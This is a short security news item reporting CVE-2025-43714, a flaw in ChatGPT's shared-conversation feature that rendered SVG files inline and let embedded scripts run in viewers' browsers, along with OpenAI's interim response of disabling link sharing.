ChatGPT Flaw Exposes Users to Malicious Image Attacks

A newly disclosed vulnerability in OpenAI’s ChatGPT platform allows attackers to embed malicious SVG and image files into shared conversations, exposing users to cross-site scripting (XSS) attacks, phishing schemes and potentially harmful visual content. Tracked as CVE-2025-43714, the flaw affects the system through March 30, 2025.

Security researchers found that ChatGPT improperly renders SVG files inline instead of treating them as code blocks. This behavior enables embedded HTML and JavaScript code to execute within users’ browsers when shared chats are reopened, turning benign-looking messages into active threats.

Unlike standard image formats, SVG files are XML-based and can carry scripts. Malicious payloads may include deceptive messages or flashing visual effects that pose risks to photosensitive individuals.

OpenAI has responded by disabling chat link sharing but has yet to issue a full patch. Experts advise users to avoid opening shared ChatGPT links from untrusted sources while mitigation efforts continue.